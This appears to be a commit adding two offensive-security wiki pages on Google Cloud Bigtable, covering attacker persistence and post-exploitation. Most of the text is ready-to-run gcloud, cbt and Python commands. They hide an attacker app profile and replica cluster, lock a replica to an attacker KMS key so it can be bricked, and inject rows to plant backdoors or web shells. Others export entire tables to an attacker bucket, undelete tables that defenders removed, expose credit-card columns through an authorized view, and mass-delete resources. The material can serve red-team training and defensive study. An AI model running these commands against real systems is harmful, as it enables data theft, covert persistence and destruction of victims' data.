Commit d25a46d ("bigtable"), parent 7c16632: 4 files changed, +537 -2 lines.
# GCP - Bigtable Persistence

{{#include ../../../banners/hacktricks-training.md}}

## Bigtable

For more information about Bigtable check:

{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}
### Dedicated attacker App Profile

**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.

Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.

```bash
gcloud bigtable app-profiles create stealth-profile \
    --instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
    --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile \
    --instance=<instance-id> --data-boost \
    --data-boost-compute-billing-owner=HOST_PAYS
```

As long as this profile exists you can reconnect using fresh credentials that reference it.
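Later access can then reference the profile explicitly; for example, recent `cbt` builds accept an `app-profile=` option on `read` (the project, instance and table IDs below are the placeholders used above):

```shell
# Route the read through the attacker-created app profile
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> \
    app-profile=stealth-profile count=10
```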

### Maintain your own replica cluster

**Permissions:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.

```bash
gcloud bigtable clusters create dark-clone \
    --instance=<instance-id> --zone=us-west4-b --num-nodes=1
```

Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
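When it's time to pull data, the dormant replica can be resized in place with `gcloud bigtable clusters update` (cluster and instance IDs are the placeholders from above):

```shell
# Scale the replica up for a fast bulk read...
gcloud bigtable clusters update dark-clone --instance=<instance-id> --num-nodes=10

# ...then back down to stay quiet
gcloud bigtable clusters update dark-clone --instance=<instance-id> --num-nodes=1
```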
43+
44+
### Lock replication behind your own CMEK
45+
46+
**Permissions:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` on the attacker-owned key.
47+
48+
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
49+
50+
```bash
51+
gcloud bigtable clusters create cmek-clone \
52+
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
53+
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
54+
```
55+
56+
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
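Because the key lives in the attacker project, denying access is a single command against the key version (key names are the placeholders from the command above; version `1` is assumed to be the active one):

```shell
# Brick the replica by disabling the CMEK version it depends on...
gcloud kms keys versions disable 1 \
    --project=<attacker-proj> --location=<kms-location> \
    --keyring=<ring> --key=<key>

# ...and re-enable it later to bring the data back
gcloud kms keys versions enable 1 \
    --project=<attacker-proj> --location=<kms-location> \
    --keyring=<ring> --key=<key>
```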

{{#include ../../../banners/hacktricks-training.md}}
# GCP - Bigtable Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Bigtable

For more information about Bigtable check:

{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}

> [!TIP]
> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
>
> ```bash
> gcloud components install cbt
> ```

### Read rows

**Permissions:** `bigtable.tables.readRows`

`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.

```bash
# Install cbt
gcloud components update
gcloud components install cbt

# Read entries with the creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```

### Write rows

**Permissions:** `bigtable.tables.mutateRows` (plus `bigtable.tables.readRows` to confirm the change).

Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.

```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>

cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin

# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> lookup <table-id> user#1337
```

`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.

### Dump rows to your bucket

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`

It's possible to exfiltrate the contents of an entire table by launching a Dataflow job that streams its rows into a GCS bucket you control.

> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over a SA with enough permissions to perform the export (by default, if not indicated otherwise, the default compute SA is used).

```bash
gcloud dataflow jobs run <job-name> \
    --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
    --project=<PROJECT> \
    --region=<REGION> \
    --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
    --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run dump-bigtable3 \
    --gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
    --project=gcp-labs-3uis1xlx \
    --region=us-central1 \
    --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
    --staging-location=gs://deleteme20u9843rhfioue/staging/
```

> [!NOTE]
> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
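For example, a Parquet export only swaps the template name and the output directory (the parameter names mirror the JSON export above; minor differences between template versions are possible):

```shell
gcloud dataflow jobs run dump-bigtable-parquet \
    --gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Parquet \
    --project=<PROJECT> \
    --region=us-central1 \
    --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-parquet/ \
    --staging-location=gs://<BUCKET>/staging/
```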

### Import rows

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`

It's possible to overwrite or extend an entire table by launching a Dataflow job that streams rows from an attacker-controlled bucket into Bigtable. The attacker first needs a Parquet file containing the data to import in the expected schema. One way to get it: export the table in Parquet format using the previous technique with the `Cloud_Bigtable_to_GCS_Parquet` template, then add new entries to the downloaded Parquet file.

> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over a SA with enough permissions to perform the import (by default, if not indicated otherwise, the default compute SA is used).

```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
    --region=<REGION> \
    --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/GCS_Parquet_to_Cloud_Bigtable \
    --project=<PROJECT> \
    --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
    --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
    --region=us-central1 \
    --gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
    --project=gcp-labs-3uis1xlx \
    --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
    --staging-location=gs://deleteme20u9843rhfioue/staging/
```

### Restoring backups

**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.

An attacker with these permissions can restore a backup into a new table under their control in order to recover old sensitive data.

```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
    --cluster=<CLUSTER_ID_SOURCE>

gcloud bigtable instances tables restore \
    --source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
    --async \
    --destination=<TABLE_ID_NEW> \
    --destination-instance=<INSTANCE_ID_DESTINATION> \
    --project=<PROJECT_ID_DESTINATION>
```

### Undelete tables

**Permissions:** `bigtable.tables.undelete`

Bigtable supports soft-deletion with a grace period (typically 7 days by default). During this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.

This is particularly useful for:
- Recovering data from tables deleted by defenders during incident response
- Accessing historical data that was intentionally purged
- Reversing accidental or malicious deletions to maintain persistence

```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
    --show-deleted

# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
    --instance=<instance-id>
```

> [!NOTE]
> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.

### Create Authorized Views

**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`

Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish **exactly the sensitive column/row sets** you care about and whitelist your own principal.

> [!WARNING]
> The catch is that creating an authorized view also requires the ability to read and mutate rows in the base table, so you are not obtaining any extra permission and this technique is mostly useless.

```bash
cat <<'EOF' > /tmp/credit-cards.json
{
  "subsetView": {
    "rowPrefixes": ["acct#"],
    "familySubsets": {
      "pii": {
        "qualifiers": ["cc_number", "cc_cvv"]
      }
    }
  }
}
EOF

gcloud bigtable authorized-views create card-dump \
    --instance=<instance-id> --table=<table-id> \
    --definition-file=/tmp/credit-cards.json

gcloud bigtable authorized-views add-iam-policy-binding card-dump \
    --instance=<instance-id> --table=<table-id> \
    --member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```

Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.

### Read Authorized Views

**Permissions:** `bigtable.authorizedViews.readRows`

If you have access to an Authorized View, you can read data from it with the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will probably limit what you can access from the table. Below is an example using Python:

```python
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest

# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"

# Read through the data API, scoping the request to the authorized view
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"

request = ReadRowsRequest(
    authorized_view_name=authorized_view_name
)

rows = data_client.read_rows(request=request)
for response in rows:
    for chunk in response.chunks:
        if chunk.row_key:
            row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
            print(f"Row: {row_key}")
        if chunk.family_name:
            family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
            qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
            value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
            print(f"  {family}:{qualifier} = {value}")
```

### Denial of Service via Delete Operations

**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`

Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:

- **`bigtable.appProfiles.delete`**: Delete application profiles, breaking client connections and routing configurations
- **`bigtable.authorizedViews.delete`**: Remove authorized views, cutting off legitimate access paths for applications
- **`bigtable.authorizedViews.deleteTagBinding`**: Remove tag bindings from authorized views
- **`bigtable.backups.delete`**: Destroy backup snapshots, eliminating disaster recovery options
- **`bigtable.clusters.delete`**: Delete entire clusters, causing immediate data unavailability
- **`bigtable.instances.delete`**: Remove complete Bigtable instances, wiping out all tables and configurations
- **`bigtable.tables.delete`**: Delete individual tables, causing data loss and application failures

```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
    --instance=<instance-id>

# Delete an authorized view
gcloud bigtable authorized-views delete <view-id> \
    --instance=<instance-id> --table=<table-id>

# Delete a backup
gcloud bigtable backups delete <backup-id> \
    --instance=<instance-id> --cluster=<cluster-id>

# Delete an app profile
gcloud bigtable app-profiles delete <profile-id> \
    --instance=<instance-id>

# Delete a cluster
gcloud bigtable clusters delete <cluster-id> \
    --instance=<instance-id>

# Delete an entire instance
gcloud bigtable instances delete <instance-id>
```

> [!WARNING]
> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.

{{#include ../../../banners/hacktricks-training.md}}